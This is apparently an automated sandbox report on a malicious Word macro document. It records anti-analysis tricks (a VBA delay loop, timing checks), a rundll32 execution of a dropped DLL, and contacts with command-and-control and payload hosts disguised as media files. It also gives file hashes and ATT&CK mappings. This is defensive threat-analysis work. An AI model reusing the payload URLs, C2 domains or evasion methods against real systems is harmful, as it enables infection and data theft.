Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: template[1].docStream path 'VBA/ThisDocument' : For i = 1 To 405306368 j = i Next i
Source: ~DF3EAF6279D3B942E8.TMP.0.drStream path 'VBA/ThisDocument' : For i = 1 To 405306368 j = i Next i For k
Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 000007FEF4734FAE second address: 000007FEF4734FBA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c rdtsc
Source: C:\Windows\System32\taskeng.exe TID: 1688Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4734F60 rdtsc
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4747F74 __crtCaptureCurrentContext,IsDebuggerPresent,__crtUnhandledException,
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4754FD4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4738BC0 LoadLibraryW,GetProcAddress,FreeLibrary,
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4747B38 GetProcessHeap,
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4734F60 rdtsc
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF47476B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 142.250.185.228 443
Source: C:\Windows\System32\rundll32.exeDomain query: com.lightbuzear.buzz
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.52.80.180 443
Source: C:\Windows\System32\rundll32.exeDomain query: www.google.com
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_invoke_watson,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,
Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,
Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,
Source: C:\Windows\System32\rundll32.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,
Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,
Source: C:\Windows\System32\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4743D80 GetSystemTimeAsFileTime,
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4749218 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,_malloc_crt,_invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4736150 GetUserNameW,GetComputerNameW,
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts22
Scripting
Path Interception111
Process Injection
1
Masquerading
OS Credential Dumping2
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Native API
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory14
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts33
Exploitation for Client Execution
Logon Script (Windows)Logon Script (Windows)111
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Account Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer14
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script22
Scripting
LSA Secrets1
System Owner/User Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Obfuscated Files or Information
Cached Domain Credentials1
Remote System Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Rundll32
DCSync1
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem114
System Information Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
template[1].doc12%VirustotalBrowse
template[1].doc18%MetadefenderBrowse
template[1].doc10%ReversingLabsDocument-Office.Trojan.Heuristic
template[1].doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\~DF3EAF6279D3B942E8.TMP100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\wnitmpo.dll100%Joe Sandbox ML
No Antivirus matches
SourceDetectionScannerLabelLink
com.lightbuzear.buzz0%VirustotalBrowse
worldoptions.buzz2%VirustotalBrowse
SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp42%VirustotalBrowse
http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4100%Avira URL Cloudmalware
http://ocsp.entrust.net030%URL Reputationsafe
https://com.lightbuzear.buzz/0%Avira URL Cloudsafe
https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torelEu0%Avira URL Cloudsafe
https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel1ci0%Avira URL Cloudsafe
http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png100%Avira URL Cloudmalware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel0%Avira URL Cloudsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.185.228
truefalse
    high
    com.lightbuzear.buzz
    64.52.80.180
    truetrueunknown
    worldoptions.buzz
    64.52.80.45
    truefalseunknown
    NameMaliciousAntivirus DetectionReputation
    http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4true
    • 2%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    https://www.Google.com/false
      high
      http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.pngtrue
      • Avira URL Cloud: malware
      unknown
      https://com.lightbuzear.buzz/Kolpt523ytcserstrew/toreltrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.entrust.net/server1.crl0rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://ocsp.entrust.net03rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://com.lightbuzear.buzz/rundll32.exe, 00000005.00000002.1198794640.000000000300F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torelEurundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel1cirundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://ocsp.entrust.net0Drundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://secure.comodo.com/CPS0rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://www.google.com/rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              142.250.185.228
              www.google.comUnited States
              15169GOOGLEUSfalse
              64.52.80.45
              worldoptions.buzzUnited States
              7029WINDSTREAMUSfalse
              64.52.80.180
              com.lightbuzear.buzzUnited States
              7029WINDSTREAMUStrue
              Joe Sandbox Version:35.0.0 Citrine
              Analysis ID:683638
              Start date and time:2022-08-14 08:38:11 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 51s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:template[1].doc
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.expl.evad.winDOC@4/13@3/3
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.9% (good quality ratio 81%)
              • Quality average: 59.7%
              • Quality standard deviation: 36.2%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .doc
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): dllhost.exe
              • TCP Packets have been reduced to 100
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              08:38:36API Interceptor461x Sleep call for process: taskeng.exe modified
              08:38:38API Interceptor1158x Sleep call for process: rundll32.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):64
              Entropy (8bit):5.015319531114784
              Encrypted:false
              SSDEEP:3:bSUsk4wyCkmqVzzSYvn7tRXMn:bnsSyNRVfS7n
              MD5:4384ECFFBEEE86478F501C6E0F37CA27
              SHA1:6F355A0907E58ACD208CA041E21FF8F4647EB2E0
              SHA-256:85BE85FEA84155D42C8C266F5F6E4F524AEEC2634FB4E5C0965DE4B22898D8FD
              SHA-512:4B6853293CB4775084457CF7FA8E8B525E5451BD0C3DDEE3C9E46208F5460342F893EAB18320374245A19BE03D10DA7C41CDC14A159086A39EE9333055D70CA8
              Malicious:false
              Reputation:low
              Preview:8vgS6wqIxCkSc+zEEkNg29ukmkCH7JpIObVw88DCgMYuCs75SuzhXb9OoIxt2JA8
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:data
              Category:downloaded
              Size (bytes):378880
              Entropy (8bit):6.133046904552265
              Encrypted:false
              SSDEEP:6144:y3fcM8b4iC7bOWasINgY1CkOPvTqhPuUh+BUI1vKHB1pL:kC4iC7bOXNDWhdKHB/
              MD5:6693755302B08318B6F6AB67783AB07E
              SHA1:7EC3E1AE2AA7DD816D856A0BDF507D88E63F6B05
              SHA-256:7FD9CBA9618AABEEB94E88535BCA0466B6B8AB27C4CB3FC6142D093B21753A8F
              SHA-512:634E3DE2B6B2536F87A71DFD4E573BD6992BCFA5D26F2B64B74172DD0CD5CC7A0EE18DF1403D664EAB6E0A4967BBDFC5E12C5A424B38BF74294C82F12B37FC9D
              Malicious:false
              Reputation:low
              IE Cache URL:http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4
              Preview:asdf....................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.uQa...a...a....q..`...'...*...'.......'...m....q..l...a.......l...h...l...`...l...`...l...`...Richa...........PE..d....[.b.........." ................@?.......................................0............`..........................................`..c...Da..................x3........... ..0.......................................p............................................text............................... ..`.rdata...].......^..................@..@.data...`T...p...*...\..............@....pdata..x3.......4..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:data
              Category:downloaded
              Size (bytes):4981
              Entropy (8bit):6.247045973732636
              Encrypted:false
              SSDEEP:96:rMcaxwVGV0IC6eyLfEG2MMy/9OemtgSM1zJgpfM1zkm/mGM1zHmOM1z1moM1zimD:oBaGrREG2pgl2pg1mRei0k5j
              MD5:D4E39CC4B61F64C5A5BC497776D83395
              SHA1:C40642027D0D79325305842C24355C85DB7291FB
              SHA-256:637EF6D2A364E9667CCA305974A4A12DFD11B6D55AFE5A5A4F00AF58A98C62E8
              SHA-512:124DCED63E83F5A59D27548B46BEFF6762316BDDC332A9A4DEC35B5A5735B77B5480A3E95D8F9AE45E9CED4E98727391C58918266610856E06698E85ED669660
              Malicious:false
              Reputation:low
              IE Cache URL:http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png
              Preview:.P&1.....Z4.T.........Y.r.&..&..,.>.vW.rrr?.2j?..b?.vV.;....5|N@.z?.r?K...;..B..rrr# !'$%:..:..$..N..l.rrr:s.$..R:s.:C.:....r......:s.$:C.}.bJ..x..us.:....K.r,..(:...(V:s...~9.(n:s..v.:s.:.7r,:.z..rr..-,/)(+.:..2."!# :.,z:.$b:..nrrr.q.vx:..:...Ir...vxr:.4b:.R:.....rrr:.R.:.<j.v.s.t.srrrr(+)*:...jr.r.r:...u....}...:.R:..rrrr:..rr"r;..rBrr;..2rrr.e:.R:.b:...5z..s..5b..N.5:E.K..52L. |.5"M/.l.5B.gD..5j2.;\.5R.P.K.5Ze?...5J...7.5*.}.5...H..5..@..5.:5T-.5..Lx....rrr...A...rrr..z...rrr...b...rrr...5.u......rrr.......rrr..4...rrr.9P...rrr.=z...rrr$mps...rrr......rrrS....r...:.R:..rrrr:..rrsr;..rbrr;..vrrr.e:.R:wr.rr:..Bsrr:..e`rr:..6srr:...b.c:..:...Jr...r:.vV:.R:.....rrr:.R:.z:.2:..Vb:.R:.....rrr:.R..q...Jsrr..p.1t...Nsrr:.2...Jsrr..b...Nsrr..2srr..2srrux.u}.(|rr:..F`rr:..6srr:...wrr"!#...:..wrrr.V..2srrsx.u.~...wrrp..srr...wrrs..srr:..L`rr:..6srr:...wrr"!#.?...:..wrrr.V..2srrtx.u.~...wrrp.^srr...wrrs.Rsrr:..#`rr:..6srr:...wrr"!#.p...:..wrrr.V..2srrn{.u.~
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):245248
              Entropy (8bit):5.036287488973504
              Encrypted:false
              SSDEEP:1536:yFune95xoysBFgV2SJKP8y/4AXbObHHdRnl57GB6Fune95xoysBFgV2SJKP8y/4C:yUnThBl/USLevCB6UnThBl/USLevCB
              MD5:79F39E4A21B47738908F07B5C6DB10DC
              SHA1:EF61EB830B56C6E887A40AFF0621E70E27AD3A78
              SHA-256:004F56B2D352C4FFA1E6B0E19821C9CB7BCFB745E318F78987AE2CBC460F10D2
              SHA-512:59650D49AB0C0B0F13F47F21B8645FCF184178A456FA90E6CBE830A5B8E83AEFC3452F1BBC7BE5CB54A91F3ED98968E8BB5DF1271FDD3B9F57459F36E0F5C0D1
              Malicious:false
              Reputation:low
              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):1024
              Entropy (8bit):0.05390218305374581
              Encrypted:false
              SSDEEP:3:ol3lYdn:4Wn
              MD5:5D4D94EE7E06BBB0AF9584119797B23A
              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
              Malicious:false
              Reputation:high, very likely benign file
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):1024
              Entropy (8bit):0.05390218305374581
              Encrypted:false
              SSDEEP:3:ol3lYdn:4Wn
              MD5:5D4D94EE7E06BBB0AF9584119797B23A
              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
              Malicious:false
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):378881
              Entropy (8bit):6.13304287996916
              Encrypted:false
              SSDEEP:6144:33fcM8b4iC7bOWasINgY1CkOPvTqhPuUh+BUI1vKHB1pLK:xC4iC7bOXNDWhdKHB/K
              MD5:7BCCA8A0DEF6F9027C52A3383477B963
              SHA1:DD5DA06A73DD3F8C86665931D2F2125DE7BE42BF
              SHA-256:A2BE0FE4CAFBCA698873FADCA25970FE24DF6FD9C2F0DA1E2DEC6561A2C33177
              SHA-512:3195C5CD33BA1D48C46206A34D8BED98E7EC6635A46CA77F7FDE70A830C70C7ABF6D1DB3130016022A3A23E7C936558276D746886D7039145F7E5B53A9745442
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.uQa...a...a....q..`...'...*...'.......'...m....q..l...a.......l...h...l...`...l...`...l...`...Richa...........PE..d....[.b.........." ................@?.......................................0............`..........................................`..c...Da..................x3........... ..0.......................................p............................................text............................... ..`.rdata...].......^..................@..@.data...`T...p...*...\..............@....pdata..x3.......4..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):378880
              Entropy (8bit):6.133036314043739
              Encrypted:false
              SSDEEP:6144:33fcM8b4iC7bOWasINgY1CkOPvTqhPuUh+BUI1vKHB1pL:xC4iC7bOXNDWhdKHB/
              MD5:CC89C9FA4DCF4BB373891C3F20AD2F56
              SHA1:5929ABEC0909DD895075EB6897462750711DFBB7
              SHA-256:0E209D2DE485637DF53C20C8425FF3F20AF6E04A46697D80F459EC6CD36C58B7
              SHA-512:87B29761587BB887654E43C529740C83AA66929FA0C995403929E3EF523DC61C9A186CE4B873C43580FE703D5D0F5D65E5348BBFC81FDE881F84FC22D8826209
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.uQa...a...a....q..`...'...*...'.......'...m....q..l...a.......l...h...l...`...l...`...l...`...Richa...........PE..d....[.b.........." ................@?.......................................0............`..........................................`..c...Da..................x3........... ..0.......................................p............................................text............................... ..`.rdata...].......^..................@..@.data...`T...p...*...\..............@....pdata..x3.......4..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):178176
              Entropy (8bit):5.0304772299397476
              Encrypted:false
              SSDEEP:1536:ld+DhMSG5wjHZddynh67Wg0zt5wGUIOp5IxcXVFtNR41g7c0T/V:luM0dyn5Xt5wG1clFzCa7c0T/
              MD5:A83E531042C7DF27D05E672B91D7D96F
              SHA1:CEF36313E249B3B43F22443DB1B86710205DEE2E
              SHA-256:844F9F4A2C8923247E96274D921DCA8BF9B63270B34885CFF8BB0509E39DCB16
              SHA-512:E171F31567470832CCAD900796E5894EAEFDDBC8881BAD1C38F6E65C610D5ECC7F34072EFFA6C08939A4F8F2EF63E68D1777AE19A82F521B64D63810DDBA5DC2
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):73
              Entropy (8bit):4.418942457548717
              Encrypted:false
              SSDEEP:3:bDuMJlJb+U+zVomX1mob+U+zVov:bCCavV+/vVy
              MD5:20676B07529FE173251F0BAFEBF29C4D
              SHA1:499ABE24E905DB974195547210D1E99477BD4644
              SHA-256:652E7F08A1DEB302C8550D4647436D7498639A20F9A5F6351F412EAEC7410DFB
              SHA-512:481C5FFC07976154AC36E72326474A5E9928144E1FC1068ACB02A209B68FB97B06C84710A604DBAD29CFCD44E1789E967F6D43B27CCF5C685AD028CE59D6062B
              Malicious:false
